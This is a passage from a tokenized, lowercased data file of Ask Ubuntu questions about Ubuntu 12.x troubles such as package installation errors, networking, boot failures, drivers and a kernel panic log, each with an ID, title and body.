translation-de_de ign http : //de.archive.ubuntu.com quantal-backports/restricted translation-de ign http : //de.archive.ubuntu.com quantal-backports/universe translation-de_de ign http : //de.archive.ubuntu.com quantal-backports/universe translation-de paketlisten werden gelesen ... unfortunatly its in german treffer means something like hit and ign could mean ignore ? apt-cache policy emacs n : paket emacs kann nicht gefunden werden which means that the package could not be found . sudo apt-get install emacs23 [ sudo ] password for joachim : paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut statusinformationen werden eingelesen ... fertig paket emacs23 ist nicht verfügbar , wird aber von einem anderen paket referenziert . das kann heißen , dass das paket fehlt , dass es abgelöst wurde oder nur aus einer anderen quelle verfügbar ist . e : paket »emacs23« hat keinen installationskandidaten the error messages means that the package emacs23 is not available but is referenced by another package . this could mean that the package is missing or that it has been terminated or that is available from another source . sudo apt-get install emacs paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut statusinformationen werden eingelesen ... fertig e : paket emacs kann nicht gefunden werden the error means that the package emacs could not be found . any ideas ?
245850	how to connect to home computer from work computer behind vpn ( using remote desktop viewer ) ?	i have a dyndns account linked to my home computer and everything is set up so that i can ssh to it from my work ( university ) computer . i then connect it to the university vpn ( using these steps ) and proceed to attempt to use the remote desktop viewer to access it graphically . however , this fails , i 'm not sure why . i tried using the dyndns url , and the local addresses returned by running ifconfig on the home laptop : eth0 link encap : ethernet hwaddr 00:90 : f5 : be:62:10 inet addr:192.168.1.78 bcast:192.168.1.255 mask:255.255.255.0 ppp0 link encap : point-to-point protocol inet addr:192.168.94.81 p-t-p:192.168.94.21 mask:255.255.255.255 but none of those worked , even after specifying the port 5900 ( which i believe should be automatically selected ) . i am not sure which one i should be using ( inet addr , p-t-p ? ) the error i get is connection to host < hostname > was closed , although sometimes it seems like a timeout , while others it fails immediately . here 's the output of ifconfig in my work computer : eth0 link encap : ethernet hwaddr bc : ae : c5:2d:3a : ef inet addr:192.168.94.7 bcast:192.168.94.255 mask:255.255.255.0 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0
245855	ubuntu fails to load gnome 3 session	i have ubuntu 12.10 installed with the gnome shell which used to work fine . i have two accounts , my own with administrator privileges and my daughter 's with standard privileges . i had trouble loading a font in font manager . the system was froze and i used alt+shift+f1 and afterwards ctrl+alt+del which caused a rebbot . now , my daughter 's account works well and loads normally in with both unity and gnome 3 . my own account fails to load both gnome 3 and unity . i was able to open a new account with admin privileges and used with no issues in gnome 3 . is there a way i can repair my own account ?
245866	kde overrides lightdm logon screen	i upgraded my kde desktop and suddenly it overrode many parts of unity user interface such as menus , icons , and specifically ( in this question ) lightdm login screen . here is a screenshot of menus : how should i fix this ?
245869	need the standard `` gtk-color-scheme '' for ambiance	i have messed up my gtk-color-scheme for ambiance . could anybody please give me the standard gtk-color-scheme of ambiance ? i have tried to google for it , but could n't find it . it is the first line ( or lines ) in : /usr/share/themes/ambiance/gtk-2.0/gtkrc
245873	how can i install deja dup series 24 in precise 12.04 ?	the integrity check in series 24 and above is important to me . i asked the question on launchpad as well : https : //answers.launchpad.net/deja-dup/+question/219779
245875	how do i get high resolution icons in unity for my application without a .desktop file ?	i am trying to fix a problem i found with a java application . it has a too low res icon . after reading the source of it i modified it to have a bigger icon . swt uses the gtk_window_set_icon ( ) function of gtk to set the icon . however , the high resolution icon is not used . there is a work around of using a .desktop file to have a nice icon described here . and others describe the problem on the ubuntu forums . so how can i have a nice icon without having to place a .desktop file in the filesystem ? where should i report the bug for this ? in which package is the code downscaling the icon that i intend to pass to the window manager ? i appreciate some help on this . this can be reproduced with the following code : import org.eclipse.swt.swt ; import org.eclipse.swt.graphics.gc ; import org.eclipse.swt.graphics.image ; import org.eclipse.swt.widgets.display ; import org.eclipse.swt.widgets.shell ; public class test { public static void main ( string [ ] args ) { display display = new display ( ) ; final int size = 256 ; image large = new image ( display , size , size ) ; gc gc = new gc ( large ) ; gc.setbackground ( display.getsystemcolor ( swt.color_red ) ) ; gc.fillarc ( 0 , 0 , size , size , 45 , 270 ) ; gc.dispose ( ) ; shell shell = new shell ( display ) ; shell.setimages ( new image [ ] { large } ) ; shell.open ( ) ; while ( ! shell.isdisposed ( ) ) { if ( ! display.readanddispatch ( ) ) display.sleep ( ) ; } large.dispose ( ) ; display.dispose ( ) ; } }
245878	not finding qt4 qwidget after update	updated from buntu 11.0 to 12.04 . i use to have qt4 ver 4.7.4 , now i have 4.8.1 . my project is failing to build because it ca n't find # include < qwidget > . a search of the disk tells me there is no qwidget file . ( it was there b/4 the update . ) other online comments say qwidget has been deprecated . others say it is still there , and supported . some say it is supported as an add-on . i have libqt4-dev installed . i see nothing that mentions an qwidget add-on . so right about now i do n't know what is what . can someone shed some light on this ? gcc -c viewer.cxx in file included from viewer.cxx:2:0 : viewer.h:5:45 : fatal error : qwidget : no such file or directory compilation terminated . i get the same type of failure when i use < qtgui/gwidget > . i have found the file @ /user/include/qt4/qtgui/ ( why i did n't find it before , i 'm not sure . ) it appears i have an issue with the projects cmake . let me work on this for a bit . thanks .
245879	cloning an encrypted hard disk to a different computer	i 'm using 12.10 with full-disk encryption . can i clone my full-encrypted hard disk from an old laptop and write it , as-is , to a new laptop and expect everything to work correctly right away ? if there is no problem from encryption point-of-view , is there something else to consider , like wrong drivers getting loaded etc , x.org being totally off etc ? what should i look into beforehand to make it less painful ?
245880	ubuntu 12.10 not recognising external hardrive	i have recently bought a 3.5 inch toshiba hdd and used a sata to usb dock . when i plug in the hardrive , it dose n't come up in the usual places but when i type lsusb it gives me bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 058f : b002 alcor micro corp . bus 002 device 004 : id 1532:0037 razer usa , ltd i believe alcor micro corp is the dock . i would like to access the hardrive to move files . this is the output i get when i type sudo fdisk -l disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table this happens when i type sudo blkid /dev/sda1 : uuid= '' 2e46f563-4edd-4f29-b287-0b67ddcf3b09 '' type= '' ext4 '' /dev/sda5 : uuid= '' b2b38503-f99a-4cfe-8cb3-10cce92608dd '' type= '' swap ''
245881	toshiba laptop ubuntu 12.10 recently overheats and turns off	this especially happens when i watch a video with movie player or adobe flash , it uses more than 60 % of my core i5 cpu . ( thats the least , it goes up after that ) in windows when i watch the same movie or flash video , it is about 20 % cpu usage . i have tried many those power managerment things in the ubuntu wiki https : //wiki.ubuntu.com/kernel/powermanagement and they did not help . my laptops is toshiba sattelite p745 - core i5 6gb ram
245886	why is ubuntu unable to mount my hard drive when i use nvidia discrete graphics ?	i have a lenovo thinkpad t520 with nvidia optimus graphics . optimus is designed to let you switch between discrete and integrated graphics as needed for performance and battery life . the bios has three options for display : optimus , integrated , and discrete . integrated and discrete enable only the intel or nvidia chipsets , respectively . the system boots fine if i selected integrated ( or optimus ) graphics in the bios , however if i choose discrete graphics , i 'm unable to boot . it appears , weirdly , that when discrete graphics are enabled , linux is unable to access my hard drive . here 's a screenshot : unfortunately , while it appears to dropped to busybox , the system is totally unresponsive at that stage and must be rebooted . the problem persists regardless of whether i 've installed nvidia 's drivers , the open source nouveau driver , or both . this is the nvidia chipset , and the intel chipset : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf119 [ quadro nvs 4200m ] ( rev a1 )
245887	trying to install the proxtube extension for google chrome i can not drag the .crx file into chrome . what 's wrong ?	i followed the description on the website but when i try to drag the proxtube.crx file into the tools tab my unity launcher to the left gets highlighted and i ca n't seem to drop the file into chrome in order to install it . how can i fix this ? i 'm using ubuntu 12.04 lts x64 and chrome version 24.0.1312.52
245888	why ca n't i connect to the internet via wired connection	i 've just resurrected an older pc to use as my linux box . before installing ubuntu i verified that the pc could connect to the internet . i installed ubuntu and am now not able to connect to the internet in a shell i type ifconfig and receive : eth0 link encap : ethernet hwaddr 00:50:8d:74:90 : a8 inet 6 addr : fe80 : :8dff : fe74:90a8/64 scope : link up broadcast running multicast mtu:1500 metric:1 cx packets:687 erros:0 dropped:0 overruns:0 frame:0 tx packets:38 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:81475 ( 81.4 kb ) tx bytes:6050 ( 6.0 kb ) interrupt:18 base address:0xb000 lspci -nnk | grep -iea3 `` ( network|ethernet ) '' returns : 02:0b.0 ethernet controller [ 0200 ] : sundance technology inc / ic plus corp ic p1 us ip100a integrated 10/100 ethernet mac + phy [ 13f0:0200 ] ( rev 31 ) subsystem : abit computer corp. device [ 147b:1c08 ] kernel driver in use : sundance kernel modules : sundance uname -r returns : 3.2.0-29-generic-pae i am connected directly ( hardwired , no wireless ) to the router in my home office dmeg | grep eth0 returns : [ 11.292409 ] eth0 : ic plus corporation ip100a fast ethernet adapter at 0001b000 , 00:50:8d:74:90 : a8 , irq 18 [ 11.293132 ] eth0 : mii phy found at address 0 , status 0x786d advertising 01e1 . [ 173.941125 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 192.986492 ] eth0 : link up [ 192.986895 ] eth0 : link changed : 100bps , full duplex
245889	trash can shortcut missing in thunar	on xubuntu 12.10 64-bit , the trash can icon shortcut is missing on the side pane in the thunar file manager . is there anyway to restore it ?
245896	running python 3.3.0 on ubuntu 12.10 ( print error )	i installed python 3.3.0 on ubuntu 12.10 ( x64 ) and when i type print 'hello world ' it brings syntax error . but when i type that in python 2.7.3 the code works . why is it happening ?
245900	how do i use two different versions of wine on the same installation ?	i need to use two different windows applications , one works well with wine 1.4 but not on wine 1.5 and the other application works well with the later version but not with the former . is there a way to have both versions of wine installed , specifying which application should run with which wine version ?
245904	terminal ( ctrl+alt+f1-6 ) text colour	is it possible to change the default foreground text coulour in the f1-f6 terminals or the machines bios colour . i love green on black and change it in the konsole/uxterm/term ect as soon as i install the os . but is it possible on the tty pure shell terminals ie . ctrl+alt+f1 ect .
245906	help in setting up wireless point to point link for client-server ( already on lan )	i have an existing mythbuntu client system and a mythbuntu client/server system on a private lan with static ips . they are both connected to a private lan using wifi . because of speed issues , i wish provide a dedicated static , point to point , wireless link between the client and server independent of the existing lan . i have an wireless access point ( ap ) and a wireless nic ( wnic ) with which to do this . since both client and client/server are connected to the lan using wnics , this means either the client or server will have 2 wnics , something networkmanager ( 0.9.4.0-0ubuntu4.2 ) can not handle . i will put the ap on the client since it has an available wired lan connection for the ap , and the server uses its wired lan connection to a small sub-network using dhcp . currently i am testing with a usb-wireless while awaiting the 3rd wnic . preliminary testing results show this is a workable solution . this is where i am stuck : how to enable the 2 wnics on the server . how to set up the 2 wireless connections on the server without using networkmanager and keep the existing `` shared with other computers '' setting on the server 's wired lan . i presume using iwconfig ( iw 3.2-1 ) and if config ( net-tools 1.60-24.1ubuntu2 ) . background . the server is a mythbuntu htpc in the den and the client is a mythbuntu htpc ( which dual boots windows ) in the master bedroom . the firewall/switch for the wired lan and another ap is in the home office . the servers dhcp sub-network provides connections for the dvd , blu-ray and television/monitor . the wnics are rosewill rnx-n150pcx pcis , the aps are linksys wrt54gls with dd-wrt ( firmware : dd-wrt v24-sp2 07/22/09 voip ) , mythbuntu is 0.26 with fixes and mythbuntu is 12.04.1 . suggestions , pointers and suggestions are requested , thanks for any help in advance .
245912	dual boot windows 7 and ubuntu , ssd + hdd	i am new to linux and ubuntu and wish to create a system that can boot both windows 7 ( for windows specific applications ) and ubuntu ( i wish to become familiar with linux and ubuntu for work ) . i have already read through a lot of material , but found nothing for quite what i am looking to do , and i am not sure how or where i should start . i have a 120gb solid state drive on which i want to locate the windows and linux os , as well as other applications that would benefit from the ssd . i additionally have a 1tb hard drive that i want to use for data/storage . from what i have read , i understand that i will need to partition the drive ( s ) or use logical volume management to set up the dual boot environment that i envision . i hope to share the data stored on the 1tb hard drive between the two operating systems , but if this is not feasible then splitting the 1tb hard drive into two or more smaller partitions would be fine . i have previously installed windows to the ssd and 'migrated ' the user 's folder to my 1tb data drive ( without manually setting up a partition or anything ) . this worked fine for a while , but the system proved unstable and no longer works , except in 'safe mode ' . i have all of my data backed up , so i intend on `` starting over '' and re-installing windows along with ubuntu . i do n't want to keep anything that is currently on the ssd or hdd . in short : -- i have a 120 gb solid state drive i want to put windows 7 and ubuntu on . -- i have a 1tb hard disk drive that i want to use as data storage for the two operating systems . -- what is the best way of going about this ? i want the system to be as stable as possible while maximizing the benefits of using an ssd to boot from/run applications . + any advice or information would be appreciated ! thanks !
245919	how can i change xfce bottom panel to the top ?	i am using xubuntu 12.10 and would like to change the panel which is currently on the bootm to the top . this is the opposite of what most people using unity want to do . i have done this in the past but have forgotten how and could not find the info easily this time . cheers ,
245925	mv : can not move `/home ' to `/old_home ' : device or resource busy	i am trying to move my /home directory following the steps described in https : //help.ubuntu.com/community/partitioning/home/moving everything works fine until i reach the point where i have to move /home to /old_home . when i issue the commands : cd / & & sudo mv /home /old_home & & sudo mkdir /home i get the error message : mv : can not move /home ' to/old_home ' : device or resource busy when i issue the command i am running a terminal and a browser . should i log out and re-enter as root to issue the command ? thank you ! jev
245926	installing on windows 8	when ever i try to boot from a dvd for 12.10 , an error messages shows that says that the system was unable to boot windows . this laptop is a dell insipron 15x , it came installed with windows 8 , is there any one who has had this problem before and can help .
245928	does ubuntu one support content-range ?	using ubuntu one 's cloud api , i try to download only the first 144 bytes of a file , using the range : bytes=0-143 directive in the http header of my request . as a response , i receive the following http header ( along with the status code 206 , aka `` partial content '' ) : content-disposition : inline ; filename=blah.txt date : mon , 21 jan 2013 23:30:06 gmt x-bzr-revision-number : 6696 etag : `` sha1:7f96fcfa002cf5791c976c46aaf733dc523d9041 ; gzip '' content-range : bytes 0-143/3909 via : 1.0 calamansi.canonical.com:3128 ( squid/2.7.stable7 ) 1.1 files.one.ubuntu.com content-type : application/octet-stream vary : accept-encoding , cookie x-cache : miss from calamansi.canonical.com set-cookie : sessionid= ... ; domain=.one.ubuntu.com ; httponly ; path=/ ; secure server : twistedweb/10.0.0 last-modified : mon , 21 jan 2013 23:17:05 gmt so apparently , according to the header i receive , i am being given 144 bytes , those which i requested . however , the body is empty . note also that content-length is not present in the header of the response ... is the response header from ubuntu one deceiving me , and the server does n't really support the range directive ?
245933	ubuntu os on iphone	hei ! i have a question regarding the mobile os . will the mobile os be able to use on the iphone ? -replace ios with ubuntu ( when its available for public download ) . best regards !
245938	transmission kills my connection ( torrent )	i have a simple one today , i 've been using transmission for a couple months now and since the beginning i noticed that if i open transmission , nothing else works.. well , i 'm talking about internet , not even typing google.com at browser . i tried setting up the upload limit to 5kbps and download to 20kbps.. even so the connection does n't work . one particular fact is that it happens just on my pc , because i can use internet with my laptop without any problem connected to the same router ! anybody else with the same problem ? does anybody knows about a fix ?
245948	how can i use the mouse in a virtual terminal ?	lately i saw some of my friends using a mouse to copy & paste text around in the virtual terminal ( ctrl+alt+f1 ) . i was amazed that this was possible and would like to use this too . he was n't sure how this was possible on his machine , but it does n't work on my machine . how do i get this to work ? actually i just made up this story about a friend . i do know how this works and i answered my own question .
245950	can not reinstall skype after manually removing its `` held back '' package	i am running 12.04 ( precise ) ubuntu on my computer , which i keep it up to date . recently skype started being listed as a `` kept back '' package whenever i ran a software update . stupidly i uninstalled skype manually using `` apt-get purge '' intending to then install the most recent version . i have learned never again to do this , as now i am unable to reinstall any version of skype . this really is a problem since it is my prime way of keeping in touch with faraway relatives . i tried telling apt-get to specifically install the version of skype and skype-bin currently in precise-updates ( 4.1.0.20.0-0ubuntu0.12.04.2 ) and which i had working just fine on my computer , but it fails : # apt-get install skype=4.1.0.20.0-0ubuntu0.12.04.2 the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . # apt-get install skype-bin=4.1.0.20.0-0ubuntu0.12.04.2 the following packages have unmet dependencies : skype-bin : i386 : depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . running aptitude search skype , i get : pi skype - client for skype voip and instant messaging service p skype : i386 - client for skype voip and instant messaging service v skype-bin - pb skype-bin : i386 - client for skype voip and instant messaging service - binary files i have learned from the man page how to interpret those initial letters and it seems weird : skype is not installed but the `` stored action '' is to install it . and skype-bin is listed as uninstalled and broken . update : as suggested by tumbleweed , here is the output of running apt-cache policy : # apt-cache policy libqtwebkit4 : i386 skype libqtwebkit4 : i386 : installed : ( none ) candidate : 2.2.1-1ubuntu4 version table : 2.2.1-1ubuntu4 0 50 http : //us.archive.ubuntu.com/ubuntu precise/main i386 packages skype : installed : ( none ) candidate : 4.1.0.20.0-0ubuntu0.12.04.2 version table : 4.1.0.20.0-0ubuntu0.12.04.2 0 500 http : //archive.canonical.com/ubuntu/ precise/partner amd64 packages update : after this i manually installed libqtwebkit4 using apt-get install , but that version ( 2.2.1-1ubuntu4 ) did not satisfy the dependencies of skype-bin ( `` > = 2.2~2011week36 '' ) . any advice on how to fix this mess would be dearly appreciated ! i promise i have learned my lesson never to try to force any update whatsoever ...
245958	trouble installing ubuntu 12.10 using windows installer on lenovo thinkpad tablet 2	when i select ubuntu from the windows boot manager screen i get this error message : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . ( windows came preinstalled ) . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the application or operating system could n't be loaded because a required file is missing or contains errors . i was downloading the windows installer directly to the tablet since i could not get the tablet to recognize a usb stick with ubuntu 12.10 on it . i have noticed that others seem to be having a similar problem . do you have any suggestions ?
245962	testing out ubuntu via usb - hanging	i wanted to test out ubuntu via usb . i loaded it on and got to the screen where it asked me whether i wanted to install it on my computer or just test it out using the usb . when i say i want to test it out , it takes me to a black screen and it just hangs with a curser line showing but i ca n't type anything . any ideas on what is wrong ?
245971	kernel-panic after large file copy	i 'm running ubuntu-server , 3.2.0-29-generic-pae . not every time , but enough that it is reproducible , when i cp or mv a large file the kernel panics . i read that changing the scheduler sometimes helps so i 'm currently using noop instead of cfq . i 've run memtest with no discernible results . and run badblocks on my ide that hosts the operating system . i have two sata 500gb hard drives attached as well . the crash that is currently documented occurred when transferring from one to the other . i ran cat /proc/kmsg on an ssh terminal and simulated a crash on my server , giving the following results : 7t : ( ul < 4 > [ 7486.965231 ] disabling lock debugging due to kernel taint < 0 > [ 7486.965231 ] [ hardware error ] : cpu 1 : machine check exception : 4 bank 0 : b20000001040080f < 0 > [ 7486.965231 ] [ hardware error ] : rip ! inexact ! 00 : < 00000000c1018b5c > < 0 > [ 7486.965231 ] [ hardware error ] : tsc 1649e27da970 < 0 > [ 7486.965231 ] [ hardware error ] : processor 0 : f34 time 1358822531 socket 0 apic 1 microcode 13 < 0 > [ 7486.965231 ] [ hardware error ] : run the above through 'mcelog -- ascii' < 0 > [ 7486.965231 ] [ hardware error ] : cpu 0 : machine check exception : 4 bank 0 : b20000001040080f < 0 > [ 7486.965231 ] [ hardware error ] : rip ! inexact ! 00 : < 00000000c12b7906 > < 0 > [ 7486.965231 ] [ hardware error ] : tsc 1649e27daae0 < 0 > [ 7486.965231 ] [ hardware error ] : processor 0 : f34 time 1358822531 socket 0 apic 0 microcode 13 < 0 > [ 7486.965231 ] [ hardware error ] : run the above through 'mcelog -- ascii' < 0 > [ 7486.965231 ] [ hardware error ] : machine check : processor context corrupt < 0 > [ 7486.965231 ] kernel panic - not syncing : fatal machine check < 4 > [ 7486.965231 ] pid : 0 , comm : swapper/1 tainted : g m 3.2.0-29-generic-pae # 46-ubuntu < 4 > [ 7486.965231 ] call trace : < 4 > [ 7486.965231 ] [ < c158f812 > ] ? printk+0x2d/0x2f < 4 > [ 7486.965231 ] [ < c158f6e0 > ] panic+0x5c/0x161 < 4 > [ 7486.965231 ] [ < c10247ef > ] mce_panic.part.14+0x13f/0x170 < 4 > [ 7486.965231 ] [ < c1024872 > ] mce_panic+0x52/0x90 < 4 > [ 7486.965231 ] [ < c1024a18 > ] mce_reign+0x168/0x170 < 4 > [ 7486.965231 ] [ < c1024bb5 > ] mce_end+0x105/0x110 < 4 > [ 7486.965231 ] [ < c10252db > ] do_machine_check+0x32b/0x4f0 < 4 > [ 7486.965231 ] [ < c1018b5c > ] ? mwait_idle+0x7c/0x1d0 < 4 > [ 7486.965231 ] [ < c1024fb0 > ] ? mce_log+0x120/0x120 < 4 > [ 7486.965231 ] [ < c15a5e47 > ] error_code+0x67/0x6c < 4 > [ 7486.965231 ] [ < c1018b5c > ] ? mwait_idle+0x7c/0x1d0 < 4 > [ 7486.965231 ] [ < c1010338 > ] cpu_idle+0xa8/0xe0 < 4 > [ 7486.965231 ] [ < c1588923 > ] start_secondary+0xe8/0xed < 3 > [ 7486.965231 ] panic occurred , switching back to text console thanks for you help ! curios p.s . this is my first post , so i apologize in advance for any breaks of etiquette .
245975	firefox does n't open - how can i correct this ?	i have chromium as the default web browser . a certain site only allows the use of either internet explorer and firefox web browsers . when i open up the dashboard and type firefox in the search , i ca n't find it .
245976	should swap and raid-1 mix ?	i have a box with a small raid-1 array being used for swap space . i only did this since i was setting up mirrors for every other partition in the system . today i read this question and it prompted me to wonder : `` is having swap on raid-1 ideal / advisable ? `` .
245977	sound levels in alsamixer versus sound levels in the 'sound settings ' menu	the maximum volume alsamixer allows me to reach is 100 % the 'sound settings ' menu ( on the upper right corner ) allows levels beyond 100 % why are these levels not reachable via alsamixer ? is this related to some deep fact about the sound architecture , or is it incidental ? are those volumes only acessible via pulse ( i.e . is alsa unaware of them ) ?
245980	juju deploy timeout	after i installed juju through the ppa and bootstrapped it , i have n't been able to deploy anything . juju responds with this : $ juju deploy mysql 2013-01-21 22:44:53,394 info searching for charm cs : precise/mysql in charm store 2013-01-21 22:45:05,592 error could not connect before timeout it happens with every charm i 've tried . i 'm running ubuntu server 12.10 . fresh install too . 12.10 has been a real pain . probably going to revert to 12.04 and wait it out until raring if it 's not going to work soon .
245981	trouble with booting from dvd on a mac	so i just downloaded the latest edition of ubuntu 32 bit onto a blank dvd . i went through the whole disk terminal and set it up the way the website showed . however when i inserted the disk it said it was n't compatible . i ignored this and restarted the computer anyway , like it says to do . the disk then ejected and it booted osx . i am running lion os and it is a macbook pro if that is relevant . can anybody tell me if this is because i downloaded a 32 bit and the computer might be a 64 ? i really do n't know , as i am very new to all of this . does anybody know what i can do ?
245987	how can i recover my data after replacing windows with ubuntu ?	i have migrated from windows 7 to ubuntu just yesterday . windows 7 was in my c : drive . i did not realise that if i wipe windows 7 and install ubuntu , ubuntu would be installed in the c : drive only . so i did n't make any backups , and i deleted windows and installed ubuntu . but , ubuntu has formatted my hard drive and i have lost all my important data ! how can i recover my data now ?
245990	no desktop after 12.10 update to 3.5.0-22 generic	after 12.10 update ( jan 15/2013 ) my desktop has changed in ways i can not explain . there is only the wallpaper , but the screen resolution is 600x400 . no unity , no menu bar . i can bring up a terminal , in 600x400 res'n . i can ctrl-alt-del to logout . after logout , i get a menu bar with the only option to shutdown or login , again in 600x400 res'n . the previous version ( 3.5.0-21 ) operates perfectly . what to do ?
245991	optimizing brightness of movie file	i have a video recorded with a very simple camera that looks quite dark . i want to increase the brightness , and while i can do it by hand , i have seen some options to apply `` smart '' optimizing algorithms , such as this one : http : //strony.aster.pl/paviko/hdragc.htm does anyone know of something like this for any of the well known video tools in ubuntu ? ( ffmpeg , mencoder , avidemux , pitivi , kdenlive , openshot ... are all fine by me ! ) thanks !
245994	suddenly can not access ssh on lan	i had ssh running on my lan server . suddenly ( not sure what i did ) , i can not access the lan server via ssh . when i try , it just hangs for a while with no response and finally comes out with a timed out message . ssh : connect to host 192.168.1.50 port 22 : connection timed out as i recall , maybe i got into some trouble trying to install phpmyadmin and pgmyadmin . still can not get that going either but this question is for ssh . i just ca n't reach my own lan server from my own desktop . not sure if it matters , but i have two network cards and one 's meant for internet connection and the other just connects to the lan . any ideas please , on how i can fix this ? edit : here 's the output of my route command destination gateway genmask flags metric ref use iface default 192.168.1.1 0.0.0.0 ug 100 0 0 eth0 192.168.1.0 * 255.255.255.0 u 0 0 0 eth1 192.168.1.0 * 255.255.255.0 u 0 0 0 eth0
245995	how to enable bluetooth rt3298 on zotac zbox ad12 under ubuntu 12.10 ?	i have a new zotac zbox ad12 and everything worked fine after installation of ubuntu 12.10 , except for the intregrated wifi and bluetooth ( combo rt3290 wifi + rt3298 bt ) i have already managed to get wifi running ( as the manufacturer provides a driver for rt3290 ) but have still no idea how to make my zbox recognizing bt . it seems that some people have been successful under 12.04 . but what about 12.10 ? any idea ?
245996	unable to install pecl extension for perl in ubuntu server 12.10	i need to call a perl script from my php file . i attempted to install the pecl extension for perl . i was unsuccessful . i tried the following : pecl channel-update pear.php.net updating channel `` pear.php.net '' update of channel `` pear.php.net '' succeeded pecl install perl downloading perl-1.0.0.tgz ... starting to download perl-1.0.0.tgz ( 24,358 bytes ) ... ..done : 24,358 bytes validation error : no release notes found parsing of package.xml from file `` /tmp/pear/temp/peartf4ijh/package.xml '' failed download of `` pecl/perl '' succeeded , but it is not a valid package archive error : can not download `` pear/perl '' download failed install failed i am running a ubuntu server 12.10 . my php version is php 5.4.6-1ubuntu1.1 ( cli ) ( built : nov 15 2012 01:18:34 ) copyright ( c ) 1997-2012 the php group zend engine v2.4.0 , copyright ( c ) 1998-2012 zend technologies with xdebug v2.2.1 , copyright ( c ) 2002-2012 , by derick rethans my perl version is this is perl 5 , version 14 , subversion 2 ( v5.14.2 ) built for x86_64-linux-gnu-thread-multi ( with 64 registered patches , see perl -v for more detail ) copyright 1987-2011 , larry wall update : i tried the latest 23rd january 2013 pecl install for perl it was labelled as 1.0.1 i got the following after running pecl install perl downloading perl-1.0.1.tgz ... starting to download perl-1.0.1.tgz ( 25,282 bytes ) ... ... ... done : 25,282 bytes 5 source files , building running : phpize configuring for : php api version : 20100412 zend module api no : 20100525 zend extension api no : 220100525 perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_sg : en '' , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_sg.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_sg : en '' , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_sg.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . building in /tmp/pear/temp/pear-build-rootcxwyp8/perl-1.0.1 running : /tmp/pear/temp/perl/configure checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for a sed that does not truncate output ... /bin/sed checking for cc ... cc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether cc accepts -g ... yes checking for cc option to accept iso c89 ... none needed checking how to run the c preprocessor ... cc -e checking for icc ... no checking for suncc ... no checking whether cc understands -c and -o together ... yes checking for system library directory ... lib checking if compiler supports -r ... no checking if compiler supports -wl , -rpath , ... yes checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking target system type ... x86_64-unknown-linux-gnu checking for php prefix ... /usr checking for php includes ... -i/usr/include/php5 -i/usr/include/php5/main -i/usr/include/php5/tsrm -i/usr/include/php5/zend -i/usr/include/php5/ext -i/usr/include/php5/ext/date/lib checking for php extension directory ... /usr/lib/php5/20100525 checking for php installed headers prefix ... /usr/include/php5 checking if debug is enabled ... no checking if zts is enabled ... no checking for re2c ... no configure : warning : you will need re2c 0.13.4 or later if you want to regenerate php parsers . checking for gawk ... no checking for nawk ... nawk checking if nawk is broken ... no checking for perl support ... yes , shared checking how to print strings ... printf checking for a sed that does not truncate output ... ( cached ) /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by cc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking for gawk ... ( cached ) nawk checking command to parse /usr/bin/nm -b output from cc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if cc supports -fno-rtti -fno-exceptions ... no checking for cc option to produce pic ... -fpic -dpic checking if cc pic flag -fpic -dpic 